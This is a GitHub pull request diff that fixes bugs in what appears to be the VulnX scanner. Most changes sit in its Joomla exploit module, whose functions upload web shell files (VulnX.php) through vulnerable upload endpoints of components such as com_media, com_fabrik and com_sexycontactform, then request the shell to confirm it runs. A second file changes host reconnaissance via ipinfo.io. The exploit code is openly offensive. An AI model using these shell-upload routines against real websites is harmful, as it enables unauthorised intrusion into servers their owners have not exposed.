Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Fix: issues #100 #85 and deleted domain age api #110

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Fix: issues #100 #85 and deleted domain age api #110

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
12 changes: 6 additions & 6 deletions modules/exploits/joomla_exploits.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -45,7 +45,7 @@ def com_jce(self):
def com_media(self):
self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
endpoint = self.url+"/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder="
self.headers={"content-type":["form-data"]}
self.headers['Content-Type']="form-data"
fieldname = 'Filedata[]'
shell = open('shell/VulnX.txt','rb')
data = {
Expand Down Expand Up @@ -101,7 +101,7 @@ def com_media(self):
#def com_jdownloadsb(self):
# self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
# endpoint = self.url+"/images/jdownloads/screenshots/VulnX.php"
# self.headers={"content-type":["form-data"]}
# self.headers['Content-Type']="form-data"
# files = open('shell/VulnX.zip','rb')
# shell = open('shell/VulnX.gif','rb')
# data = {
Expand Down Expand Up @@ -131,7 +131,7 @@ def com_fabrika(self):
self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
endpoint = self.url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"

self.headers={"content-type":["form-data"]}
self.headers['Content-Type']="form-data"
fieldname = 'file'
shell = open('shell/VulnX.php','rb')
data = {
Expand All @@ -158,7 +158,7 @@ def com_fabrikb(self):
self.headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
endpoint = self.url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"

self.headers={"content-type":["form-data"]}
self.headers['Content-Type']="form-data"
fieldname = 'file'
shell = open('shell/VulnX.txt','rb')
data = {
Expand Down Expand Up @@ -189,7 +189,7 @@ def com_foxcontact(self):
# 'components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php'}
endpoint = self.url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"

self.headers={"content-type":["form-data"]}
self.headers['Content-Type']="form-data"
fieldname = 'file'
shell = open('shell/VulnX.txt','rb')
data = {
Expand Down Expand Up @@ -353,7 +353,7 @@ def com_sexycontactform(self):
fieldname = "image[]"
files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
data = { fieldname : files }
requests.post(endpoint, data=data, heades=self.headers,verify=False).text
requests.post(endpoint, data=data, headers=self.headers,verify=False).text
shellup = self.url + "/com_sexycontactform/fileupload/files/files/VulnX.php?Vuln=X"
checkShell = requests.get(shellup,headers=self.headers,verify=False).text
statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
Expand Down
30 changes: 12 additions & 18 deletions modules/gathering/host_gathering.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -37,24 +37,18 @@ def os_server(self):
print(' {0} Cannot Find the server headers ' .format(bad))

def web_host(self):
urldate = "https://input.payapi.io/v1/api/fraud/domain/age/" + hostd(self.url)
getinfo = requests.get(urldate, self.headers,verify=False).text
regex_date = r'Date: (.+?)-(.+?)'
regex_date = re.compile(regex_date)
matches = re.search(regex_date, getinfo)
try:
if matches:
print(' {0} Domain Created on : {1}'.format(good, matches.group(1)))
ip = socket.gethostbyname(hostd(self.url))
print(' {0} CloudFlare IP : {1}'.format(good, ip))
ipinfo = "http://ipinfo.io/" + ip + "/json"
gather = requests.get(ipinfo, self.headers).text

self.match_printer('Country',self.match_info(r'country\": \"(.+?)\"',gather))
self.match_printer('Region',self.match_info(r'region\": \"(.+?)\"',gather))
self.match_printer('Timezone',self.match_info(r'timezone\": \"(.+?)\"',gather))
self.match_printer('Postal',self.match_info(r'postal\": \"(.+?)\"',gather))
self.match_printer('Org',self.match_info(r'org\": \"(.+?)\"',gather))
self.match_printer('Location',self.match_info(r'loc\": \"(.+?)\"',gather))
ip = socket.gethostbyname(hostd(self.url))
print(' {0} CloudFlare IP : {1}'.format(good, ip))
ipinfo = "http://ipinfo.io/" + ip + "/json"
gather = requests.get(ipinfo, self.headers).text

self.match_printer('Hostname',self.match_info(r'hostname\": \"(.+?)\"',gather))
self.match_printer('City',self.match_info(r'city\": \"(.+?)\"',gather))
self.match_printer('Region',self.match_info(r'region\": \"(.+?)\"',gather))
self.match_printer('Country',self.match_info(r'country\": \"(.+?)\"',gather))
self.match_printer('Timezone',self.match_info(r'timezone\": \"(.+?)\"',gather))
self.match_printer('Org',self.match_info(r'org\": \"(.+?)\"',gather))
self.match_printer('Location',self.match_info(r'loc\": \"(.+?)\"',gather))
except Exception as err:
print(' {0} Parse Error : {1}' .format(bad,err))